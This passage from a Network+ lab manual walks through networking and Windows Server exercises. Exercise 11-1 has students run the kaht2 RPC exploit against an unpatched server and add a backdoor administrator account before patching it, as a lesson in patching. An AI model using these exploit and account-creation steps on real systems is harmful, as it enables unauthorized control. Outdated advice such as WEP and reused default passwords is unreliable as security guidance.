21. Type ls again to see the contents of the Marketing directory. Notice the
MarketingTrends.doc file in the output.
22. To download the MarketingTrends.doc file, type get marketingtrends.doc.
23. The file is downloaded and confirmed with a transfer complete statement.
24. Type Quit to close the FTP session.
- 83 -
Glen E. Clarke
Exercise 6-8
Using Ping
In this exercise, you will ping a system on your network and then ping your own software
stack by pinging the loopback address.
1. Ensure that you have the 2003SERVERA and XP Client VM running.
2. Go to the XPClient VM.
3. Go to the command prompt by selecting Start | Run and then type CMD.
4. At the command prompt, type ping 10.0.0.1. In this example, you are pinging the
2003SERVERA system by its IP address.
5. You will get four replies back from the ping message if the system you have pinged is up and
running.
6. To test your TCP/IP software stack, you can ping the loopback address by typing ping
127.0.0.1.
7. If you receive four lines of information showing successes, the TCP/IP protocol is initialized
and functioning. Four lines of failed transmissions will show that TCP/IP is not initialized
and cannot be used to perform network transmissions.
Note: 127.0.0.1 is a reserved address used as a loopback to test that TCP/IP is functioning on the
local PC.
- 84 -
Glen E. Clarke
Exercise 6-9
Using the NSLOOKUP Utility
In this exercise, you will use NSLOOKUP to view a list of DNS entries for a particular
company. You will also switch the record type to mx and view a list of mail servers for
Microsoft.com on the Internet.
1. Switch to the XP Client VM.
2. Go to Start | Run.
3. In the Run window, type CMD.
4. First, lets find out the IP address of www.networkplus.loc by typing nslookup
www.networkplus.locyou are then returned the IP address of that system.
5. To use the interactive prompt of nslookup, type NSLOOKUP and press ENTER.
6. NSLOOKUP will display two lines of information: The first specifies your default DNS
server name to which you are connected, and the second is the IP address of that DNS server.
The default DNS server is the DNS server configured in your TCP/IP properties. The prompt
will be blinking next to a > symbol.
7. The first thing you want to do is switch to a different DNS server to send your queries to.
You can do this by typing server 10.0.0.2 (the IP address of a different DNS server) and
press ENTER.
8. You can see that NSLOOKUP reports the new server you are connected to, and you can now
send queries to the server for specific records. You actually want to use 10.0.0.1 as your DNS
server, so type server 10.0.0.1 and press ENTER.
9. To do a zone transfer of a zone on the server, type ls networkplus.loc and press ENTER.
10. You can see in the output that the networkplus.loc company has www and ftp servers and
you see their associated IP addresses.
11. Next you will get a list of e-mail servers for the networkplus.loc fictitious company. Type set
type=mx and press ENTER. This tells nslookup that you want to view the mail exchange
- 85 -
Glen E. Clarke
records. Mail exchange records are the records in DNS that point to a companys mail
servers.
12. To view the mail exchange records, type the domain name of the company and press ENTER.
In our example, you type networkplus.loc and press ENTER.
13. Type exit and press ENTER to quit the nslookup prompt.
14. Type exit and press ENTER to quit the command prompt.
- 86 -
Glen E. Clarke
Exercise 7-1
Configuring a Wireless Network
In this exercise, you will configure a D-Link DIR-615 wireless router. You will perform
tasks such as changing the admin password, implementing MAC filtering, and implementing
WEP.
1. Take the wireless router out of the box and connect the WAN port to your Internet
connection.
2. To administer the wireless router, start Internet Explorer, type http://192.168.0.1, and then
press ENTER.
3. You are asked to log on. There is no password on the admin account by default, so click
Logon.
4. Once logged on, you want to change the admin password. To set a password for the admin
account so that others cannot log on, click the Tools link at the top and then in the Admin
Password section type the password Pa$$w0rd and confirm the password by typing the
same thing again. Click Save Settings at the top of the page.
5. Choose Reboot Now to have the changes take effect. Wait 30 seconds and then type
http://192.168.0.1 in the browser again.
6. Try to log on with no password. Were you successful? ___________
7. Now log on with the admin password Pa$$w0rd that you have set earlier.
Implementing MAC Filtering
8. To implement MAC filtering on this router, click the Advanced link at the top.
9. Choose the Network Filter option on the left.
10. You will notice that MAC filtering is disabled by default. To enable MAC filtering, choose
the Configure MAC Filtering drop-down list and choose Turn MAC Filtering On and
Allow Computers Listed to Access the Network.
- 87 -
Glen E. Clarke
11. Now you are able to list the MAC addresses of people that may connect to the network by
typing the MAC address of the client or choose the client from the client list and then hit the
<< button to add that MAC address.
12. Once you have added all of the MAC addresses, click Save Settings.
Changing the SSID and Implementing WEP
13. To implement WEP security on the wireless router, choose the Setup link at the top of the
page and then click the Wireless Settings link on the left.
14. Choose Manual Wireless Setup.
15. For the wireless network name, type NetPlus.
16. If you wanted to disable SSID broadcasting, you would set the Visibility Status to Invisible.
I am going to leave it at Visible.
17. To enable WEP encryption, set the Security Mode drop-down list to WEP.
18. Then below that set the key strength to 128 bit and set each WEP key (in all four places) to
NetPlus123456,
19. Choose Save Settings at the top of the page. You will lose your connection if you are
connected to the router via wireless because now you have to configure the wireless client
settings the same as the router.
Configuring an XP Client
20. On the XP client with a wireless network card, right-click the network icon in the system tray
and choose View Available Wireless Networks.
21. You should see the NetPlus network. Select it and choose Connect.
22. When prompted for the key, type NetPlus123456.
23. Once connected. you should be able to surf the Internet.
- 88 -
Glen E. Clarke
Exercise 8-1
Creating a PPP Dial-Up Connection in Windows XP
In this exercise, you will use the New Connection Wizard in Windows XP to create a
RAS connection that will dial up a corporate RAS server that resides at the phone number 5555555.
1. Choose Start, right-click My Network Places, and choose Properties.
2. In the Network Connections window, click the Create a New Connection link on the left
side of the screen in the Network Tasks list.
3. Click Next to pass the welcome screen.
4. Select the type of connection you want to build. In this example you are dialing in to a RAS
server over a phone line, so choose the Connect to the network at my workplace option.
You will notice that the description of this option specifies that you are using the dial-up
feature or VPN. Also note that the option says that you are connecting to the workplace, but
you would use this option any time you are dialing into a RAS server or a VPN server. Click
Next.
5. Now you specify whether you want to use the dial-up or VPN feature. In this example you
are going to dial up the server; choose Dialup Connection and click Next.
6. Next you will need to choose a communication device. Select the check box next to the
modem and choose Next.
7. You are then asked to name the connection. You want to be sure to give a meaningful name
to the connection. If this connection is to be used to dial up your ISP, I would name it after
your ISP. If you are dialing in to your office, I would name it after your company.
8. Choose Next.
9. You are then asked for the phone number of the server you wish to connect to. You will need
to include the area code and maybe a 1 if the call is long distance. Enter 555-555-5555 as the
phone number and choose Next.
- 89 -
Glen E. Clarke
10. Click Finish. The dial-in dialog box appears, wanting you to connect to that server; you can
click Cancel.
11. After you click Cancel, you can see your dialup connection in the Network Connections
window.
12. To change settings of the connection, such as the phone number being dialed or the type of
server you want to dial, whether it is SLIP or PPP, you can right-click the connection and
choose Properties.
13. In the properties of the connection you can change a number of settings, including the phone
number you are dialing on the General page, your dialing option on the Option tab, the
authentication protocols on the Security tab, and the type of server you are dialing on the
Networking tab.
14. Once you have browsed through the options, click Cancel.
15. To connect to the server by dialing the phone number of the connection, right-click the
connection and choose Connect. Type the username and password of someone who has
permission to dial into that server.
16. Cancel all windows to end the exercise.
- 90 -
Glen E. Clarke
Exercise 8-2
Enabling Modem Logging in Windows XP
In this exercise, you will enable logging on the modem to aid in the troubleshooting of
communication problems with RAS-based protocols.
1. Go to Device Manager by right-clicking My Computer in the Start menu and choose
Properties. Click the Device Manager button on the Hardware tab.
2. In Device Manager, locate your modem in the modems category. Right-click your modem
and choose Properties.
3. In the modem properties, click the Diagnostics tab and at the bottom choose the Append to
Log option. Notice that you can also do a diagnostics on the modem with the Query Modem
button.
4. Click OK and close all windows.
- 91 -
Glen E. Clarke
Exercise 8-3
Setting Up a VPN Server in Windows Server 2003
In this exercise, you will configure your 2003SERVERA system as a VPN Server and
allow the Windows XP client to VPN into the network.
Setting Up the VMs
1. Ensure that all VMs are stopped.
2. Add a second network card to 2003SERVERB by choosing the VM menu and then Settings.
Click Add and add another Ethernet card. This card will be the network card connected to the
Internet so that a VPN client can VPN into the network. Choose Host Only as the type of
connection for the card.
3. Start the 2003SERVERA, 2003SERVERB, and XP VMs.
4. Change the IP address on the newly added card for the 2003SERVERB VM to 14.0.0.1 with
a subnet mask of 255.0.0.0. You will pretend that the 14.0.0.0 network is on the Internet.
5. Change the IP address of the XP VM to be 14.0.0.2 with a subnet mask of 255.0.0.0. This
will place the XP client on the Internet with the 2003SERVERB.
6. From the XP client can you ping 14.0.0.1? _________
7. From the XP client can you ping 10.0.0.1 (the 2003SERVERA)? _________
8. On the 2003SERVERB VM create a user named Bob with a password of Pa$$w0rd. This
will be the user that can VPN into the network. Create a group called MyVPNUsers and
place Bob in that group.
Configuring the VPN Server
9. To configure 2003SERVERB as the VPN Server, switch to the 2003SERVERB VM.
10. To enable the VPN server feature in Windows Server 2003, you will start the Routing and
Remote access feature by choosing Start | Administrative Tools | Routing And Remote
Access.
- 92 -
Glen E. Clarke
11. Right-click the 2003SERVERB icon and choose Configure And Enable Routing And
Remote Access.
12. The Routing and Remote Access Wizard starts. Click Next.
13. In the Configuration screen, choose Remote Access (Dial-up Or VPN) and then choose
Next.
14. For the connection type, choose VPN and then click Next.
15. In the VPN connection screen, choose the interface that clients will connect to from the
Internet. This is the interface with the IP address of 14.0.0.1. Choose that interface and then
click Next. Notice that there is an option selected stating that packet filtering is enable on this
interface. This will ensure that no other traffic can get through the interface except VPN
traffic.
16. You will let DHCP assign an IP address to the client when the client connects, so ensure
Automatically is selected and then click Next.
17. Choose Next to not use RADIUS.
18. Click Finish.
19. Read the message that appears. You have to configure the 2003SERVERA system as the
DHCP relay agent. Click OK.
20. To configure the DHCP Relay, select the DHCP Relay Agent node on the left. Now rightclick the DHCP Relay Agent and choose Properties.
21. Type the IP address of the DHCP Server, which is 10.0.0.1, and then click Add.
22. To allow users to VPN into the network, you will have to change the RAS policy because by
default no one is allowed to RAS or VPN into the network. To change the RAS policy,
choose the Remote Access Policies node on the left.
23. On the right side, right-click Connections To Microsoft Routing And Remote Access
Server and then choose Properties.
24. Click Add.
25. At the bottom of the list, choose Windows-Group.
- 93 -
Glen E. Clarke
26. Click Add and then type myVPNUsers and click the Check Name button to verify that the
group exists.
27. Choose the Grant Remote Access Permission option to change the rule to allow this group
to VPN into the network.
28. Click OK three times to back your way out of the dialog boxes.
- 94 -
Glen E. Clarke
Exercise 8-4
Setting Up Windows XP as a PPTP Client
In this exercise, you will configure your Windows XP client as a PPTP client to VPN into
a PPTP server created in the preceding exercise.
1. Choose Start | Control Panel and click Network And Internet Connections and then
choose Network Connections.
2. In the Network Connections window, click the Create A New Connection link on the left
side of the screen in the Network Tasks list.
3. Click Next to pass the welcome screen.
4. Select the type of connection you wish to build. Because you are connecting to a VPN server,
choose the Connect to the network at my workplace option. You will notice that the
description of this option specifies that you are using the dial-up feature or VPN. Also note
that the option says that you are connecting to the workplace, but you would use this option
anytime you are dialing into a RAS server or a VPN server. Click Next.
5. Now specify whether you want to use the dialup or VPN feature. In this example, you are
going to connect to a VPN server, so choose Virtual Private Network Connection and click
Next.
6. You will now give the connection a meaningful name. Type VPN Server In New York as
the name for the connection and choose Next.
7. You will now provide the IP address or FQDN of the VPN server. This will act as the phone
number for the VPN server you are connecting to. Type 14.0.0.1 and then choose Next.
8. Choose Finish to complete the Connection Wizard.
9. The Logon dialog box displays to make a connection to this VPN server. Click Cancel
because you will now set that you want to use PPTP instead of L2TP to connect to the VPN
server.
10. Right-click the VPN Server In New York connection and choose Properties.
- 95 -
Glen E. Clarke
11. In the properties of the connection, go to the Networking tab and click the drop-down list to
set the VPN Type you want to use. Select PPTP VPN from the list. Then choose OK.
Connecting to the VPN Server
13. To dial into the VPN server, double-click the VPN Server In New York icon.
14. Type your username of bob and password of Pa$$w0rd and click Connect.
15. You should see a screen indicating that you have connected. To verify, start a command
prompt and enter ping 10.0.0.1. Were you successful? ___________
Changing Your VMs Back to the Original Configuration
16. If you have snapshots created in the VMs, revert to the original snapshots.
17. If you dont have snapshots, you will need to change the IP address of the XP client so that it
is back on the original 10.0.0.0 network. This is required to complete the next lab.
- 96 -
Glen E. Clarke
Exercise 8-5
Using Remote Desktop
In this exercise, you will enable remote desktop on your Windows Server 2003 system,
and then you will remote-desktop into that system from the XP client. This is a useful feature for
remote administration.
1. Start the 2003SERVERA, 2003SERVERB, and the XP VMs.
2. Switch to the 2003SERVERA VM.
3. To enable Remote Desktop, click Start and then right-click My Computer and choose
Properties.
4. Choose the Remote tab.
5. In the Remote Desktop section, choose the option that says Allow users to connect
remotely to this computer.
6. A window appears letting you know that anyone who remotely connects must have a
password. Choose OK.
7. Choose OK.
Remotely Connecting from the Windows XP Client
8. Switch to the Windows XP VM.
9. To start the remote desktop, client click Start | Run and then type mstsc and choose OK.
10. Type the IP address of 10.0.0.1 and then click OK.
11. You should see the Windows Server 2003 screen appear and ask you to log on. Log on with
your administrator account and a password of Pa$$w0rd.
12. Once logged on, you can administer the server from the remote session.
- 97 -
Glen E. Clarke
Exercise 9-1
Packet-Switching Network Exercise
In this exercise, you are given a scenario and a network diagram to determine the path of
a data packet.
Your company has a headquarters and ten remote offices. All of the offices are connected
by a packet-switching network to create a WAN. Look at the following figure, and then answer
the following questions.
PC A is at the main headquarters, and PC B is at one of the remote offices. Each router in
the diagram designates an office. You are sending data from PC A to PC B, and you want to try
to determine the path the data will take on its route. Using a diagnostic utility, you determine that
all of the even-numbered routers are extremely busy and are sending slow transmissions from the
local LAN and remote LANs.
1. What path could data packets take from PC A to PC B?
2. Is it possible that the data packets could arrive out of order?
3. What are some reasons Router 1 might be preferred over Router 3?
4. What path would be used if the odd-numbered routers were offline or busy, and the evennumbered routers were online and not busy?
- 98 -
Glen E. Clarke
5. What would occur if Routers 1, 2, and 3 were to become extremely busy or go offline?
The answers are as follows:
1. The route would be from PC A to the default gateway, then to either Router 1 or Router 3.
The packet will then travel from Router 1 or 3 to Router 5, and from Router 5 to Router 7 or
Router 9. Then the data packet will go from Router 7 or 9 to the default gateway for PC B,
and then to PC B.
2. Yes; since there are still multiple routes, one data path might be less busy than another at any
given time. This could allow some data packets to arrive before others. For example, if
Router 1 should suddenly become a little busier than Router 3, any packets sent to Router 3
might arrive before those sent to Router 1.
3. Router 3 might be busier than Router 1, which will cause a packet to be delayed a little while.
The routers might be configured to have a specific method to determine which route to use as
a default or to make one more used than another. This could cause one router to be used until
it is too busy, at which point another will be used. The specified method could be determined
by hop counts or by some other configured means.
4. From PC A the data packet would be passed to the default gateway, which would then be
passed to Router 2. From Router 2, the data packet would be sent to either Router 4 or Router
6. Router 4 or Router 6 would send the data packet to Router 8. Router 8 would send the data
packets to the default gateway for PC B; at that point, the packet would be sent to PC B.
5. No data could be sent from PC A to PC B, because there would be no open path from PC A
to PC B.
- 99 -
Glen E. Clarke
Exercise 9-2
ATM Network Exercise
In this exercise, you are given some questions that a manager might ask. Assume that you
are the person the manager is questioning about ATM technology for the purpose of possible
implementation.
1. Can the ATM technology be used to replace our LAN?
2. Can the ATM network be in place with our existing category-3 network until we get the
cables replaced with other type?
3. What cabling is preferred for optimal speed?
4. What is the top speed we can achieve if we replace the cabling with fiber optic?
5. Is ATM a digital technology?
1. Yes; ATM is usable as either a LAN or WAN technology.
2. Yes; the ATM network can operate at a speed lower than its capability. The network will
operate at around 12.96 Mbps to 25 Mbps, depending on the network functionality and the
devices purchased.
3. Fiber-optic cable is the preferred medium.
4. With fiber-optic cable, the speeds of ATM could be as high as 622.08 Mbps, or, with future
technology advances, as high as 2.488 Gbps.
5. No; it is a broadband technology similar to cable TV.
- 100 -
Glen E. Clarke
Exercise 9-3
Frame Relay Network Exercise
In this exercise, three companies are each using a Frame Relay connection to a remote
office. Figure 9-5 shows the WAN and how it will be connected. You will need to determine the
answers to some questions about the WAN.
Company A is larger than both Company B and Company C. Because Company A has
many more users than the other two, those two have leased 50 percent of the Frame Relay
connection to meet their needs.
Company B and Company C do not need as much bandwidth as Company A, so
Company B leased 20 percent and Company C leased the remaining 30 percent of the
connection.
The Frame Relay connection supports transfer rates higher than 2 Mbps and is used
strictly by these three companies. Other Frame Relay networks exist for other companies, but
this connection is strictly for these three companies.
Answer the following questions:
1. On Monday morning, Company A is using only 30 percent of the leased connection.
Company B is using 20 percent of the leased connection. Company C needs to transmit a
large data file from the headquarters to the remote office. Company C is using 40 percent of
the Frame Relay connection. After about 20 minutes have passed and only half of the data
- 101 -
Glen E. Clarke
file has been sent, Company A starts using 15 percent more of the connection. What will this
cause to happen?
2. On a Sunday afternoon, an administrator goes into the main office at Company B. No one is
using the link at Company A or Company C. The administrator needs to perform a remote
backup of a server at the remote office. How much of the bandwidth will be available for the
backup?
3. Company C is closed on a specified day during which the other companies, A and B, are still
open. Company A is using 55 percent of the bandwidth, and Company B is using the
remaining 45 percent. Later in the day, Company B starts trying to use more bandwidth.
What will occur?
4. Referring to Question 3, what would occur when data files are sent and their packets are
dropped?
1. The transmissions from Company C will start to be dropped if the transmission is not slowed
when requested. This will cause the portion of the leased line for Company C to drop to 35
percent.
2. Although Company B has leased only 20 percent of the bandwidth, 100 percent can be used
if no one else is using it.
3. Packets will start being dropped. Most likely, more packets will be dropped for Company B
than for Company A, inasmuch as Company B is further over its leased limit than Company
A. It is possible that the transmissions will decrease from Company B if the request to slow
transmissions is not ignored.
4. The protocol being used would request packets to be re-sent. This allows any dropped
packets to be re-sent so that the data files are complete and intact.
- 102 -
Glen E. Clarke
Exercise 10-1
Confirming Networking Components in Windows XP
In this exercise, you will verify that you have a network card driver, client software, and
a protocol installed on a Windows XP system so that the system can connect to a Microsoft
server.
1. Select Start and then right-click My Network Places and choose Properties.
2. If you have a Local Area Connection, this means that your network card driver has been
loaded. If you do not have a Local Area Connection, you will need to load the network card
driver first through the Add Hardware Wizard. Right-click Local Area Connection and
choose Properties.
3. In the Local Area Connection Properties window, you can see the network card driver that is
being used for this LAN connection in the Connect Using option at the top of the dialog box.
4. You can also see that the Client for Microsoft Networks is loaded, which allows you to
connect to shared folders on a system running Microsoft operating systems.
5. To view the protocol being used, scroll down until you see the protocols in the network
components list. Do you see the TCP/IP protocol? _______________
6. Notice that the system also has File and Print Sharing for Microsoft Networksthis is the
network software that must be installed to allow Microsoft clients to connect to shared
folders on your system.
7. Looking at the components in the list, answer yes or no to what is installed:
a. TCP/IP installed? _____________
b. Client for Microsoft Networks installed? ________________
c. File and Print Sharing installed? _____________________
d. IPX/SPX installed? _______________
- 103 -
Glen E. Clarke
Exercise 10-2
Installing Windows Server 2003
In this exercise, you will first install Windows Server 2003 and then you will create a
domain controller that runs the active directory database. This domain controller will be referred
to in all the remaining exercises in this chapter.
1. Create a new VM called 2003SERVERC.
2. Place your Windows Server 2003 CD in the CD-ROM drive and then power on the
2003SERVERC VM.
3. The system boots off the CD and then starts the installation.
4. After some setup files are copied to the system, the Welcome To Setup screen appears. To
install Windows Server 2003, press ENTER.
5. Press F8 to agree to the license agreement.
6. You will be shown a list of drives and partitions on which Windows Server 2003 can be
installed; make sure that the first drive is selected. Choose C to create a partition.
7. Type 15000 MB as the partition size and press ENTER.
8. The newly created partition is displayed; select it and press ENTER to install the OS to that
partition.
9. Choose to format (quick) the partition for NTFS and press ENTER.
10. The partition is formatted, and setup files are copied to the hard disk. After that, the GUI
portion of the installation starts to complete installing Windows.
11. Select Next to accept the English language.
12. Type your name and organization in the screen that follows and choose Next.
13. Type your product key and then choose Next.
14. Choose to have 100 per server licenses and choose Next. This will allow for 100 clients to
connect to the server at one time.
- 104 -
Glen E. Clarke
15. Type 2003SERVERC as your computer name and Pa$$w0rd as the password for the
administrator account. Click Next.
16. Choose your time zone and click Next.
17. Choose Typical for the network settings and click Next.
18. Choose No to being part of a domain and choose Next.
Creating a Domain Controller by Installing Active Directory
19. Setup finishes, and then you are presented with the Windows Logon dialog box. Press CTRLALT-DEL
to log on as Administrator, type a password of Pa$$w0rd (case sensitive), and click
OK. Once you have logged on, change your IP address to 10.0.0.40 with a subnet mask of
255.0.0.0.
20. You will now install Active Directory on this system by running dcpromo.exe. Select Start |
Run and then type dcpromo. Click OK.
21. The Active Directory Installation Wizard begins; click Next.
22. Click Next on the Operating System Compatibility screen.
23. Choose Domain controller for a new domain and choose Next.
24. Choose Domain in a new forest and choose Next.
25. Type the DNS name of networkplus2.loc for the new domain and then choose Next.
26. Choose Next to accept the NetBIOS name.
27. Choose Next to accept the location of the active directory database files.
28. Choose Next to accept the location of the sysvol folder, which is where policies are stored.
29. Accept the default choice to install DNS on this system and choose Next.
30. Choose Next on the permission compatibility screen.
31. Type a password of Pa$$w0rd as the directory service restore password, which is used to
restore Active Directory.
32. Click Next on the summary screen. Active Directory installs on your system. Click Finish
when it has completed; you will then need to reboot.
- 105 -
Glen E. Clarke
33. After the server has rebooted, you can log on as the administrator with the password of
Pa$$w0rd.
Verifying Active Directory Installation
34. To verify that Active Directory has installed, click Start | All Programs | Administrative
Tools | Active Directory Users and Computers.
35. On the left side of the screen you should see a domain called networkplus2.loc. When you
expand it, you will notice a folder called Users.
36. You can shut down this VM, as you will use the 2003SERVERA VM in the future exercises.
- 106 -
Glen E. Clarke
Exercise 10-3
Creating Users in Active Directory
In this exercise, you will learn to create network user accounts in Active Directory by
using the Active Directory Users and Computers console.
2. Log on as Administrator with a password of Pa$$w0rd.
3. Select Start | All Programs | Administrative Tools | Active Directory Users And
Computers.
4. You may organize user accounts by organizational units (OUs) in any fashion you like. Some
administrators organize users by department or by location. You will first create an OU to
hold our user accounts. Right-click the networkplus.loc domain and choose New |
Organizational Unit.
5. Type the name Chicago as the name of the OU and choose OK.
6. Now create an Organizational Unit for New York.
7. You should now see the Chicago and New York OUs, each of which looks like a folder with
a book on it. To create a user in the Chicago OU, right-click the Chicago OU and choose
New | User.
8. The New User dialog box appears. Give the new user account the first name of Bob and a
last name of Smith. Set the user logon name to bsmith.
9. Click Next.
10. Use a strong password for your new user account. You will use Pa$$w0rdnot a great
password but one that uses a mix of uppercase and lowercase characters along with a symbol
and number.
11. Click Next.
12. Click Finish.
13. You should see the Bob Smith user account in the Chicago OU.
- 107 -
Glen E. Clarke
Exercise 10-4
Configuring a Password Policy
In this exercise, you will learn to create a password policy on a Windows Server 2003
domain controller so that the policy affects all domain accounts.
2. Select Start | All Programs | Administrative Tools | Domain Controller Security Policy.
3. Expand Account Policy and select Password Policy on the left side.
4. Double-click Maximum Password Age on the right side of the screen to set the maximum
number of days a user is allowed to keep his or her password.
5. Choose Define This Policy and type 30 days as the time when the password will expire.
6. Click OK.
7. Click OK.
8. Double-click the Enforce Password History option to specify how many passwords you
want Windows to remember and not allow a user to reuse.
9. Choose Define This Policy Setting and type 24 passwords as the number of passwords to
remember. This means that Windows will not allow a user to use a password he/she has used
24 times ago.
10. Click OK.
11. Change the following policy options to match those in the table that follows.
Policy Option
Setting
Minimum password age
Minimum password length
Password must meet complexity
Enabled
requirements
- 108 -
Glen E. Clarke
requirements
12. Now all users will need to follow those password requirements when they change their
passwords. Close all windows.
- 109 -
Glen E. Clarke
Exercise 10-5
Creating Groups in Active Directory
In this exercise, you will learn to create a global group in Active Directory for the Sales
team within your organization. You will then add the Bob Smith account to this Sales group.
1. Select Start | All Programs | Administrative Tools | Active Directory Users And
Computers.
2. Expand the domain, right-click the Chicago OU, and choose New | Group.
3. Type Sales as the group name and make sure that Global is selected to create a global group
and that Security is selected as the group type so that you can use this group for permissions.
Choose OK.
4. To add the Bob Smith account to the group, right-click the Sales group and choose
Properties.
5. Select the Members tab to see who is a member of the group and to add a new user to the
member list.
6. Click Add to add a member.
7. Type Bob Smith and click OK.
8. You should now see the Bob Smith account on the Members tab of the group.
9. Click OK.
- 110 -
Glen E. Clarke
Exercise 10-6
Configuring Permissions in Windows Server 2003
In this exercise, you will learn to set NTFS permissions and shared folder permissions to
secure the data folder on your Windows Server 2003 system.
2. Select Start | My Computer.
3. Double-click drive C.
4. Choose File | New | Folder.
5. Type Data as the name of the folder.
6. Right-click the data folder and choose Properties.
7. Select the Security tab and then click Advanced.
8. Deselect the Allow Inheritable Permissions check box and then choose Remove when
prompted.
9. Click OK.
10. Click Add to add a user or group to the permission list and then type Sales and choose OK.
11. Sales is added to the permission list. Select Sales and then choose Modify Permission.
12. Click OK.
Sharing the Data Folder
13. Right-click the Data folder and choose Sharing and Security.
14. Select Share This Folder. Notice that the share name is the same name as the folderin this
case Data. Click Permissions to set the share permissions.
15. Click Remove to remove the default of Everyone having read permission.
16. Click Add and type administrators;sales and then choose OK.
17. Select Administrators and then choose Full Control as the permission.
- 111 -
Glen E. Clarke
18. Select Sales and then choose Change as the permission.

19. Click OK.
20. Click OK again.
- 112 -
Glen E. Clarke
Exercise 10-7
Installing a Printer on a Windows Server 2003 Print Server
In this exercise, you will learn to install a printer on a Windows Server 2003, making the
system a print server. Once you have installed the printer, you will configure the permissions so
that only the Sales group can print to the printer.
1. Log on to 2003SERVERA as administrator.
2. Select Start | Printers And Faxes.
3. Once the Printer And Faxes Dialog box displays, double-click the Add Printer icon to install
a printer.
4. Click Next on the Welcome page.
5. Make sure that a local printer is selected and then deselect the check box to autodetect the
printer.
6. Click Next.
7. Ensure that LPT1 is selected as the port for this demo but make a note that you can print to a
network print device (printer connected directly to the network) by choosing Create A New
Port and then selecting a TCP/IP port. You will then be asked the IP address of the device. I
am assuming for this exercise there is no real print device, so simply choose LPT1 and
choose Next.
8. Select HP as the manufacturer and LaserJet 4 as the model. Notice that there is a Have Disk
button in case your printer is not listedyou could browse to the location of the driver file
with have disk.
9. Click Next.
10. Name the printer Sales and then choose Next.
11. Choose Next to accept the default share name of the printer.
12. Choose Next without specifying a location.
13. Choose No to printing a test page and then choose Next.
- 113 -
Glen E. Clarke
14. Click Finish, and the driver is installed for your new printer.
Changing Printer Permissions
15. Once the printer is installed, right-click the Sales printer and choose Properties.
16. Select the Security tab; then select the Everyone group and click Remove.
17. Click Add and then type sales and choose OK. The sales group is added to the permission
list and given the print permission.
18. Click OK.
- 114 -
Glen E. Clarke
Exercise 10-8
Creating Accounts (Extra Challenge)
In this exercise, you will create five user accounts and then create two groups.
1. Create the following user accounts and groups in the Chicago OU that was created in an
earlier exercise.
Account Name
Object Type
Information
Jill Doe
User
Password: Pa$$w0rd
Bob Doe
User
Password: Pa$$w0rd
Tom Doe
User
Password: Pa$$w0rd
Sue Doe
User
Password: Pa$$w0rd
Glen Doe
User
Password: Pa$$w0rd
Marketing
Group (global, security)
Members: Jill, Bob, Tom
Managers
Group (global, security)
Members: Sue, Glen
2. Once you have created these user accounts in Active Directory, go to your Linux system and
create the same users and groups in Linux.
3. Create a gclarke account in Linux Red Hat from a command shell.
- 115 -
Glen E. Clarke
Exercise 10-9
Identifying Built-in Groups
In this exercise, you will review the purpose of some of the built-in groups in Windows
by identifying which group would be used for which scenario.
Scenario
Answer
What built-in group in Windows can perform

backups and restores?
What built-in group in Windows can perform any

administrative action?
What built-in group in Windows can shut down the

server and manage shares?
What built-in group in Windows can manage the

printers on the network?
All users are a member of which built-in group?
- 116 -
Glen E. Clarke
Exercise 10-9 Answer

Scenario
Answer
What built-in group in Windows can perform
Backup Operators
backups and restores?
What built-in group in Windows can perform any
Administrators
administrative action?
What built-in group in Windows can shut down the
Server Operators
server and manage shares?
What built-in group in Windows can manage the
Printer Operators
printers on the network?
All users are a member of which built-in group?
Users
- 117 -
Glen E. Clarke
Exercise 11-1
Patching a System with Windows Update
In this exercise, you will run Windows Update to bring your Windows 2000 Server
system up to date in order to help protect the system from known vulnerabilities. Before patching
the system, you will first download and leverage an RPC exploit known as kaht2 that will allow
you to connect to the Windows 2000 Server as the operating system account and take full control
of the unpatched system. After verifying that you could connect to the unpatched system, you
will then patch the server by running Windows update and trying the exploit againthe second
time you will be unsuccessful because the system has been patched. Please note that it is illegal
to gain unauthorized access to another system, network, or devicethis lab is for educational
purposes only and is designed to show the importance of patching a system.
Compromising an Unpatched System
1. On your Windows XP system, download the kaht2.zip file
fromwww.securityfocus.com/bid/8205/exploit. Once you have downloaded the Zip file,
extract it to c:\labfiles\tools\kaht2.
2. Click Start | Run and then type cmd.
3. Choose OK.
4. At the command prompt, type cd c:\labfiles\tools\kaht2.
5. You will now use two IP addresses with the kaht command-line utility. Address 1 will be the
IP address that is one less than the address of your unpatched Windows 2000 Server, whereas
address 2 is the IP address of your Windows 2000 Server. Once you know these two
addresses, type kaht2 <address1> <address2> and press ENTER. If you are following the lab
setup, you will type: kaht2 10.0.0.19 10.0.0.20
6. If you are connected to the server, you will be sitting at the prompt of c:\winnt\system32
which is the C:\drive of the server you have just compromised!
7. To verify that you are connected as the system account and can create your own user account
on the server, type net user bobby password /add.
- 118 -
Glen E. Clarke
8. To place this newly created user account in the administrators group of the server, type net
localgroup administrators bobby /add.
9. You have proven that you can take control of an unpatched system by creating your own
administrative account. Type Exit to exit out of the kaht2 shell.
10. Type Exit to exit out of the command window.
Patching the System with Windows Update
11. To protect the server from the kaht attack, you need to make sure that you patch the server.
Microsoft is aware of the vulnerability, and the vulnerability will be fixed if you perform a
full Windows update on the system. On the Windows 2000 Server select Start | Windows
Update.
12. The Windows Update site is loaded in the browser. Click the Scan For Updates link.
13. Windows scans for updates for your system.
14. Click the Review And Install Updates link and you will be presented with a list of updates
that need to be installed.
15. You will notice on the left side that there are eight critical updates and five updates for
Windows 2000 that are not considered critical. Review the list of updates on the right side of
the screen. To install the updates, click the Install button on the right side of the screen. This
will take some time, and you may have to reboot your system a few times, depending on
what is installed. After each reboot you will need to restart the Windows Update through the
Start button. You may get asked questions during the install, such as to agree to the license
agreement, and you can click Next on any of the installation screens and accept all defaults
for the installation of any of the updates.
Trying to Exploit a Patched System
16. Once the update of the system is complete, lets verify that the patching of the system
prevents the RPC exploit from happening again. Go to your Windows XP Professional
system and type: kaht2 10.0.0.19 10.0.0.20
you should be unsuccessful with this attack.
- 119 -
Glen E. Clarke
Exercise 11-2
Installing and Configuring Antivirus Software
In this exercise, you will install Norton AntiVirus 2003 on your Windows XP
Professional system and then configure it to do a scan every second night at 12 A.M. You will
then update your virus definitions to ensure that your virus protection software is up to date, and
you will configure real-time protection and e-mail protection.
Installing Norton AntiVirus 2003
1. Place your Norton AntiVirus CD in the computer and then wait for the splash page to load. If
the splash page does not load, you may need to run the cdstart.exe file from the CD to get the
splash screen.
2. Click Install Norton AntiVirus 2003.
3. Click Next on the Welcome screen.
4. Click Next to accept the default installation folder.
5. Click Next to begin the installation. The installation will take a few minutes.
6. Click Next.
7. Click Finish. Norton AntiVirus has been installed on your client system.
